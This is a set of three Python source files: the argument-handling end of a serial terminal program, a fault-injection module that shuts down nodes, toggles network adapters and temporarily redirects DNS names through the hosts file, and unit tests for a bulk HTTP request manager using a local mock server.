parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
node_tools.py
|
# Copyright (c) 2014 Artem Rozumenko (artyom.rozumenko@gmail.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Node tools command."""
from os import system, path, sep
from time import time, sleep
from threading import Thread
from inspect import isfunction
from locust.common import (parse_args_list, message_wrapper, sudo_require,
convert_timeout)
from locust.common import IS_WINDOWS
if IS_WINDOWS:
#pylint: disable=F0401
from win32api import GetSystemDirectory as sys_path
else:
#pylint: disable=E0611
from netifaces import interfaces
def _run_thread(target, args=None, ret_msg=''):
"""Run given function in separate Thread """
assert isfunction(target), "Target should be a function"
args = args or ()
assert isinstance(args, tuple), "Args should be a tuple or empty"
thread = Thread(target=target, args=args)
thread.start()
return message_wrapper(ret_msg)
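# Illustrative use of _run_thread (not part of the original module): run a
# hypothetical slow task in the background and return a status message to the
# caller immediately, exactly as the commands below do.
#
#   def _slow_task(seconds):
#       sleep(seconds)
#
#   _run_thread(_slow_task, args=(5,), ret_msg='Task started')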
@sudo_require
def shutdown_node():
"""Shutdown local node."""
return _run_thread(_shutdown_node, ret_msg='Node is shut down')
def _shutdown_node():
"""Shutdown local node."""
sleep(3)
if IS_WINDOWS:
system("shutdown /p /f")
else:
system("shutdown -h now")
@sudo_require
def restart_node():
"""Restart local node."""
return _run_thread(_restart_node, ret_msg='Node is restarted')
def _restart_node():
"""Restart local node in thread."""
sleep(3)
if IS_WINDOWS:
system("shutdown /r /f")
else:
system("shutdown -r now")
@sudo_require
def disable_network_adapters(adapters=None, timeout=0):
"""
Disable network adapters.
Arguments:
adapters - list of network adapters to disable.
If list is empty, all adapters will be disabled.
        timeout - number of seconds to keep the adapters disabled before
                  re-enabling them. Default value - 0 (leave disabled).
"""
timeout = convert_timeout(timeout, def_timeout=0)
adapters = parse_args_list(adapters)
return _run_thread(_disable_network_adapters, args=(adapters, timeout),
ret_msg='Network adapter is disabled')
@sudo_require
def enable_network_adapters(adapters=None):
"""
Enable network adapters.
Arguments:
        adapters - list of network adapters to enable.
If list is empty, all adapters will be enabled.
"""
loc_adapters = parse_args_list([] if adapters is None else adapters)
result = True
if IS_WINDOWS:
cmd_ptrn = 'wmic path win32_networkadapter ' \
'where PhysicalAdapter=True call enable'
if loc_adapters:
cmd_ptrn = 'netsh interface set interface name="{name}" ' \
'admin=enabled'
else:
cmd_ptrn = 'ifconfig {name} up'
# Ubuntu bug: https://bugs.launchpad.net/ubuntu/
# +source/gnome-settings-daemon/+bug/1072518
# os.system('service networking restart')
if not loc_adapters:
loc_adapters = interfaces()
if loc_adapters:
for adapter in loc_adapters:
retcode = system(cmd_ptrn.format(name=adapter))
if retcode != 0:
result = False
else:
        #the comparison returns a bool value
result = 0 == system(cmd_ptrn)
if result:
return message_wrapper('Network adapter is enabled')
return message_wrapper('Network adapter is not enabled', status='error')
def _disable_network_adapters(adapters=None, timeout=0):
"""
Disable network adapters.
Arguments:
adapters - list of network adapters to disable.
If list is empty, all adapters will be disabled.
        timeout - number of seconds to keep the adapters disabled before
                  re-enabling them. Default value - 0 (leave disabled).
"""
sleep(3)
if IS_WINDOWS:
cmd_ptrn = 'wmic path win32_networkadapter ' \
'where PhysicalAdapter=True call disable'
if adapters:
cmd_ptrn = 'netsh interface set interface name="{name}" ' \
'admin=disabled'
else:
cmd_ptrn = 'ifconfig {name} down'
if not adapters:
adapters = interfaces()
if adapters:
for adapter in adapters:
system(cmd_ptrn.format(name=adapter))
else:
system(cmd_ptrn)
if timeout:
sleep(timeout)
enable_network_adapters(adapters)
@sudo_require
def list_network_adapters():
"""
Return list of network adapters.
Argument:
None
Return:
List of network adapters dicts.
"""
if IS_WINDOWS:
#pylint: disable=F0401
from wmi import WMI
query = "select * from Win32_NetworkAdapter where PhysicalAdapter=TRUE"
result = WMI().query(query)
net_adapters = [i.NetConnectionID for i in result if i.PhysicalAdapter]
else:
net_adapters = interfaces()
return net_adapters
@sudo_require
def blink_networking(enable_network_timeout, disable_network_timeout,
adapters=None, timeout=30):
"""
Blink network adapters.
Arguments:
adapters - list of network adapters to blink;
If list is empty, all adapters will be disabled;
        enable_network_timeout - number of seconds adapters stay enabled;
        disable_network_timeout - number of seconds adapters stay disabled;
        timeout - total duration of network blinking (the work_time option in
                  the example below).
Example:
butcher-agent blink networking 10 5 --adapters=eth0 --work_time=30
"""
adapters = parse_args_list(adapters)
timeout = convert_timeout(timeout, def_timeout=0)
enable_network_timeout = convert_timeout(enable_network_timeout,
def_timeout=1)
disable_network_timeout = convert_timeout(disable_network_timeout,
def_timeout=1)
return _run_thread(_blink_networking, args=(enable_network_timeout,
disable_network_timeout,
adapters, timeout),
ret_msg='Network blinking is started')
def _blink_networking(enable_network_timeout, disable_network_timeout,
adapters=None, timeout=0):
"""
Blink network adapters.
Arguments:
adapters - list of network adapters to blink.
If list is empty, all adapters will be disabled.
        enable_network_timeout - number of seconds adapters stay enabled
        disable_network_timeout - number of seconds adapters stay disabled
timeout - amount of seconds while adapters will be disabled.
Default value - 0.
"""
sleep(3)
if timeout:
end_time = time() + timeout
else:
end_time = time()
while True:
_disable_network_adapters(adapters=adapters,
timeout=disable_network_timeout)
sleep(enable_network_timeout)
if time() > end_time:
break
return message_wrapper('Network blinking is finished')
@sudo_require
def block_dnsname(dnsname, timeout=30):
"""
Redirect dnsname to localhost
Arguments:
dnsname - list of DNS names that will be redirected to localhost
        timeout - how long the change stays in effect (Default: 30 sec)
"""
dnsname = parse_args_list(dnsname)
timeout = convert_timeout(timeout, def_timeout=30)
return _run_thread(_block_dnsname, args=(dnsname, timeout),
ret_msg='Redirect dnsname to localhost is started')
def _block_dnsname(dnsname, timeout):
"""
Redirect dnsname to localhost
Arguments:
dnsname - list of DNS names that will be redirected to localhost
        timeout - how long the change stays in effect
"""
args = ['etc', 'hosts']
if IS_WINDOWS:
args = [sys_path(), 'drivers'] + args
else:
args.insert(0, sep)
#pylint: disable=W0142
host_path = path.join(*args)
with open(host_path, 'a+') as open_file:
hosts_value = open_file.read()
open_file.seek(0, 2)
open_file.writelines(['\n127.0.0.1 ' + each for each in dnsname])
sleep(timeout)
#return previous values
with open(host_path, 'w') as open_file:
open_file.write(hosts_value)
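# Illustrative use of the commands above (not part of the original module;
# requires admin/root rights and assumes parse_args_list accepts a plain
# comma-separated string):
#
#   list_network_adapters()                    # e.g. ['lo', 'eth0']
#   block_dnsname('example.com', timeout=10)   # redirect to 127.0.0.1 for 10 s
#   blink_networking(5, 5, adapters='eth0', timeout=30)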
|
test_bulkreq.py
|
import time
import unittest
from .mocks.httpserver import MockHTTPServer
from threading import Thread
from concurrent.futures import Future
from performance.driver.classes.channel.utils.bulk import \
injectResultTimestampFn, Request, RequestPool, BulkRequestManager
def createRequestWithFuture():
"""
Creates a `Request` and populates the `future` field in the same way
the `BulkRequestManager` populates it when the request is placed.
"""
req = Request('http://127.0.0.1:40506', 'test')
req.future = injectResultTimestampFn(Future())
return req
class TestBulkRequestManager(unittest.TestCase):
def test_injectResultTimestampFn(self):
"""
Test if the `injectResultTimestampFn` correctly replaces the
    `set_result` and `set_exception` methods.
"""
# Test the presence of the `resultTime` field
future = Future()
self.assertFalse(hasattr(future, 'resultTime'))
injectResultTimestampFn(future)
self.assertTrue(hasattr(future, 'resultTime'))
# The resultTime should contain the time of the result set
future = injectResultTimestampFn(Future())
ts = time.time()
future.set_result(123)
self.assertTrue(future.done())
self.assertLessEqual(future.resultTime - ts, 0.01) # We have 10 ms tolerance
# The resultTime should contain the time of the exception set
future = injectResultTimestampFn(Future())
ts = time.time()
future.set_exception(RuntimeError('Foobar'))
self.assertTrue(future.done())
self.assertLessEqual(future.resultTime - ts, 0.01) # We have 10 ms tolerance
def test_RequestPool_waitOne(self):
"""
Test if the requestPool properly exits when a single future is completed
"""
pool = RequestPool()
# Put two futures
req1 = createRequestWithFuture()
req2 = createRequestWithFuture()
self.assertEqual(len(pool), 0)
pool.append(req1)
pool.append(req2)
self.assertEqual(len(pool), 2)
# Complete first future in a thread
def completeThread():
time.sleep(0.01)
req1.future.set_result(123)
# Start complete thread and wait for one request
Thread(target=completeThread, daemon=True).start()
# Wait for all of them, making sure that we did not time out
# (Note that timeout does not raise an exception)
ts = time.time()
reqF = pool.waitOne(timeout=1)
deltaTs = time.time() - ts
self.assertLessEqual(deltaTs, 0.5)
# Completed items are removed
self.assertEqual(len(pool), 1)
# Validate
self.assertEqual(reqF, req1)
self.assertTrue(req1.future.done())
self.assertFalse(req2.future.done())
def test_RequestPool_waitAll(self):
"""
    Test if the requestPool properly exits when all futures are completed
"""
pool = RequestPool()
# Put two futures
req1 = createRequestWithFuture()
req2 = createRequestWithFuture()
self.assertEqual(len(pool), 0)
pool.append(req1)
pool.append(req2)
self.assertEqual(len(pool), 2)
# Complete first future in a thread
def completeThread():
time.sleep(0.01)
req1.future.set_result(123)
time.sleep(0.09)
req2.future.set_result(234)
# Start complete thread and wait for one request
Thread(target=completeThread, daemon=True).start()
# Wait for all of them, making sure that we did not time out
# (Note that timeout does not raise an exception)
ts = time.time()
reqAll = pool.waitAll(timeout=1.5)
deltaTs = time.time() - ts
self.assertLessEqual(deltaTs, 1.25)
# Completed items are removed
self.assertEqual(len(pool), 0)
# Validate
self.assertCountEqual(reqAll, [req1, req2])
self.assertTrue(req1.future.done())
self.assertTrue(req2.future.done())
def test_RequestPool_waitOne_interrupt(self):
"""
Test if the requestPool properly gets interrupted when waiting for one
"""
pool = RequestPool()
# Put two futures
req1 = createRequestWithFuture()
req2 = createRequestWithFuture()
self.assertEqual(len(pool), 0)
pool.append(req1)
pool.append(req2)
self.assertEqual(len(pool), 2)
# Complete first future in a thread
def interruptThread():
time.sleep(0.01)
pool.interrupt()
# Start complete thread and wait for one request
Thread(target=interruptThread, daemon=True).start()
# Wait for all of them, making sure that we did not time out
# (Note that timeout does not raise an exception)
ts = time.time()
reqF = pool.waitOne(timeout=1)
deltaTs = time.time() - ts
self.assertLessEqual(deltaTs, 0.5)
# Nothing should have been removed
self.assertEqual(len(pool), 2)
# Validate
self.assertEqual(reqF, None)
self.assertFalse(req1.future.done())
self.assertFalse(req2.future.done())
def test_RequestPool_waitAll_interrupt(self):
"""
Test if the requestPool properly gets interrupted when waiting for all
"""
pool = RequestPool()
# Put two futures
req1 = createRequestWithFuture()
req2 = createRequestWithFuture()
self.assertEqual(len(pool), 0)
pool.append(req1)
pool.append(req2)
self.assertEqual(len(pool), 2)
# Complete first future in a thread
def interruptThread():
time.sleep(0.01)
pool.interrupt()
# Start complete thread and wait for one request
Thread(target=interruptThread, daemon=True).start()
# Wait for all of them, making sure that we did not time out
# (Note that timeout does not raise an exception)
ts = time.time()
reqF = pool.waitAll(timeout=1)
deltaTs = time.time() - ts
self.assertLessEqual(deltaTs, 0.5)
# Nothing should have been removed
self.assertEqual(len(pool), 2)
# Validate
self.assertEqual(reqF, [])
self.assertFalse(req1.future.done())
self.assertFalse(req2.future.done())
def test_BulkRequestManager_simple(self):
"""
    Test if the BulkRequestManager can place a simple HTTP request
"""
manager = BulkRequestManager()
server = MockHTTPServer()
# Start a local mock server
server.start()
url = 'http://127.0.0.1:{}'.format(server.port)
# Schedule a single request
manager.enqueue(Request(url))
# Execute
(completed, failed) = manager.execute().result()
manager.session.close()
server.stop()
# Check
self.assertEqual(server.totalConnections, 1)
self.assertEqual(server.totalRequests, 1)
self.assertEqual(len(completed), 1)
self.assertEqual(len(failed), 0)
self.assertEqual(completed[0].status_code, 200)
def test_BulkRequestManager_many(self):
"""
    Test if the BulkRequestManager can place many HTTP requests
"""
manager = BulkRequestManager()
server = MockHTTPServer()
# Start a local mock server
server.start()
url = 'http://127.0.0.1:{}'.format(server.port)
# Schedule multiple HTTP requests
for i in range(0, 100):
manager.enqueue(Request(url))
# Execute
(completed, failed) = manager.execute().result()
manager.session.close()
server.stop()
# By default, the number of workers is 2, so there will be no more
# than two connections
self.assertEqual(server.totalConnections, 2)
# Check if the requests were placed correctly
self.assertEqual(server.totalRequests, 100)
self.assertEqual(len(completed), 100)
self.assertEqual(len(failed), 0)
self.assertEqual(completed[0].status_code, 200)
def test_BulkRequestManager_parallel(self):
"""
    Test if the BulkRequestManager can place many parallel requests
"""
manager = BulkRequestManager(parallel=10)
server = MockHTTPServer(fakeLattency=0.1)
# Start a local mock server
server.start()
url = 'http://127.0.0.1:{}'.format(server.port)
# Schedule multiple HTTP requests
for i in range(0, 100):
manager.enqueue(Request(url))
# Execute
(completed, failed) = manager.execute().result()
manager.session.close()
server.stop()
# There should be 10 total connections
self.assertEqual(server.totalConnections, 10)
# Check if the requests were placed correctly
self.assertEqual(server.totalRequests, 100)
self.assertEqual(len(completed), 100)
self.assertEqual(len(failed), 0)
self.assertEqual(completed[0].status_code, 200)
def test_BulkRequestManager_bulk(self):
"""
    Test if the BulkRequestManager can place many burst requests
"""
manager = BulkRequestManager(burst=10)
server = MockHTTPServer(fakeLattency=0.1)
# Start a local mock server
server.start()
url = 'http://127.0.0.1:{}'.format(server.port)
# Schedule multiple HTTP requests
for i in range(0, 100):
manager.enqueue(Request(url))
# Execute
(completed, failed) = manager.execute().result()
manager.session.close()
server.stop()
# There should be 10 total connections
self.assertEqual(server.totalConnections, 10)
# Check if the requests were placed correctly
self.assertEqual(server.totalRequests, 100)
self.assertEqual(len(completed), 100)
self.assertEqual(len(failed), 0)
self.assertEqual(completed[0].status_code, 200)
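# Convenience entry point added for illustration (not part of the original
# file): allows running this suite directly with `python test_bulkreq.py`.
if __name__ == '__main__':
    unittest.main()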
|